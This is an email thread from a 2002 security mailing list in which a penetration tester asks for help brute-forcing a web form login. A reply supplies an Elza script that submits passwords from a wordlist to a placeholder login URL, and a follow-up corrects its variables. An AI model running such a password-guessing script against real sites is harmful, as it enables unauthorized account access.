Whoops, Always spot the mistakes after you send it. Dodgy coding.
the line : subst ACCOUNT = admin should read as: subst USERSTRING = admin also the line : print Positive Authentication with Login: ACCOUNT, Password: CURRPASS should read as : print Positive Authentication with Login: USERSTRING, Password: PASSSTRING regards Greg > -----Original Message----- > From: Greg [mailto:[EMAIL PROTECTED]] > Sent: 20 April 2002 02:05 > To: joh ket; [EMAIL PROTECTED] > Subject: RE: Password HTML form bruteforce > > > I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if > you ask me. > > Why don't you try Elza > (http://online.securityfocus.com/tools/1127) with this script > which is based on one found in the Elza docs. Obviously change > the target url and username. This script will read each string > from words.txt and submit each attempt checking for the > > var autoredir = on > subst ACCOUNT = admin > > proc POSITIVEAUTH > print Positive Authentication with Login: ACCOUNT, > Password: CURRPASS > endproc POSITIVEAUTH > > proc ATTEMPTAUTH > field userid = USERSTRING > field password = PASSSTRING > # Add any other form fields that need to be sent here > post url http://TargetAddress/Login.cfm > call POSITIVEAUTH if body = Some warm glowing message > about how you're logged in now. > endproc ATTEMPTAUTH > > call ATTEMPTAUTH PASSSTRING % words.txt > > In the above script, if you set 'autoredir' to off you will not > be automatically redirected by the 302 and the '%location%' > variable will be made available to you for examination. It might > be easier to just let Elza handle the redirection and then match > some known test in the body of the successful authentication page > as shown above. > > Read the docs for Elza, you'll need to build a list of scripts up > before it become really useful. > > cheers > > Greg > > > > -----Original Message----- > > From: joh ket [mailto:[EMAIL PROTECTED]] > > Sent: 18 April 2002 10:16 > > To: [EMAIL PROTECTED] > > Subject: Password HTML form bruteforce > > > > > > > > > > Hi there, > > > > I am currently involved in a pen test on a website > > which is using formbased authentication. > > > > I figured out that a account, named 'test' exists... > > (...) > > > > Now I want to brute force this account, I am using > > Brutus AET2 for this. > > > > But I do not know how to use the HTML response. > > > > Below the packet capture of a response of a login > > which was succesfull: > > > > HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid= > > (lines deleted) > > <head><title>Document.Moved</title></head><body > > ><h1>Object.Moved</h1> > > This.document.may.be.found.<a.HREF="start.cfm? > > cid= > > (lines deleted) > > > > A capture of an unsuccessfull capture looks like this: > > > > HTTP/1.1.302.Object.Moved..Location:.original.cfm? > > login=Invalid password. Please try again > > (lines deleted) > > Document.Moved</title></head>.<body><h1>Object. > > Moved</h1>This.document.may.be.found.<a.HREF=" > > original.cfm?login=Invalid password. Please try > > again">here</a> > > > > So depending on the password I get redirected to a > > page... > > > > How should the primary and the secondary repsonse > > be configured? > > > > Or does somebody else have a better idea how to do > > this? > > > > Thanks in advance! > > > > Joh Ket > > > > > > ------------------------------------------------------------------ > > ---------- > > This list is provided by the SecurityFocus Security Intelligence > > Alert (SIA) > > Service. For more information on SecurityFocus' SIA service which > > automatically alerts you to the latest security vulnerabilities > > please see: > > https://alerts.securityfocus.com/ > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
